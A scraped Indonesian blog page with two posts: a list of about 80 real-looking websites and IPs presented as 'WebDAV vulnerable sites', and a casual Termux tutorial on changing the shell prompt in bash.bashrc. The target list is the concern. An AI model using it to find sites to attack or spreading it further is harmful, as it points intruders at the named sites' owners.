http://rooftruss.co.za
http://savanacloud.com
http://southernafricablog.com
http://stand66.com
http://tapifare.com
http://techdirect.co.za
http://thepremiummakers.com
http://thepremiummakers.com
http://trafficam.co.za
http://whadiz.com
http://whosting.co.za
http://whosting.co.za
http://savanacloud.com
http://opiniong.com
http://thepremiummakers.com
http://quintessential-tours.com
http://prorepafrica.com
http://rollaslat.com
Http://orbfusion.com
http://jormid.net
http://savanacloud.com
http://orbfusion.com
http://studentsonline.co.za
http://safemode.co.za
http://cederberghouse.co.za
http://rollaslat.com
http://rooftruss.co.za
http://savanacloud.com
http://southernafricablog.com
http://stand66.com
http://tapifare.com
http://techdirect.co.za
http://thepremiummakers.com
http://trafficam.co.za
http://whadiz.com
http://whosting.co.za
http://whosting.co.za
http://savanacloud.com
http://opiniong.com
http://thepremiummakers.com
http://tabloidjubi.com
http://wildfly.co.za
http://www.nuclear-experts.net
http://www.anecra.pt
http://209.60.104.53
http://baza.ds.org.rs
http://oulitnet.co.za
http://liteoptec.co.za
http://0739.gwytk.com
http://hr.systematixshares.com
http://leader.gwytk.com
http://www.rabachino.com
http://b2b.modelberg.it
http://hengyue-media.com
http://webphone.zayhi.com
http://koiis.co.kr
http://223.255.137.119
http://sys.betafac.com
http://gateway.net.co
http://hq.prospec.co.th
http://branch.prospec.co.th
http://rso.gie-vso.fr
http://112acil.com
http://maestrodascia.eu
http://mediacom.biz
http://tciglobal.com
http://0731.zgxxk.net
http://0745.gwytk.com
http://bestilling.utdanningsdirektoratet.no
http://www.ldgb.net
http://www.zgxxk.net
http://www.567888.pw
http://www.danahias.at
http://www.wsdscu.org
http://bestilling.udir.no
http://scm.icams.co.kr
http://158.36.153.158
http://tirupurjobs.net
http://www.apparelworld.org
http://www.tirupurjobs.net
http://apparelworld.org
http://gma2t.wlannet.net
http://praso.wlannet.net

Tuh gayn semoga ber bermanfaat :v jangan lupa share ke temen-temen lu semua ya tq....

Kumpulan Web Vuln Webdav

Ya kembali lagi dengan gw Marshall Gans😎 kali ini gw bakalan ngasih tutorial cara mengganti tanda ($) ditermuk caranya cukup mudah loh...
Yu kita simak....

  • Yang pertama buka termuxnya
  • Lalu ketikan kode ini sob
$ apt update && apt upgrade
$ pkg install nano
$ cd ../usr/etc
$ nano bash.bashrc

  • Tar muncul seperti ini sob



  • Nah jika sudah muncul seperti itu tinggal ubah yang bacaan '/$ ' nih saya berikan contohnya
 PS1="root@Marshall~#"

  • Marshallnya bisa diganti dengan selera kalian
  • Jika sudah tinggal save lah njir :'v
  • Gak tau cara savenya? Tekan vol bawah+x  -y atau ctrl+x  -y
  • Nah jika berhasil tar kaya gini sob...

  • Gimana mudahkan?? 
Mungkin cukup sekian yang bisa saya sampaikan kalo gak faham bisa komen ya sob. Jangan lupa share ke temen-temen kalian tq....

Cara Mengganti Tanda $ Di Termux

Friday, February 1, 2019
0 Comments

- Copyright © Learning Tech - Blogger Templates - Powered by Blogger - Designed by Johanes Djogan -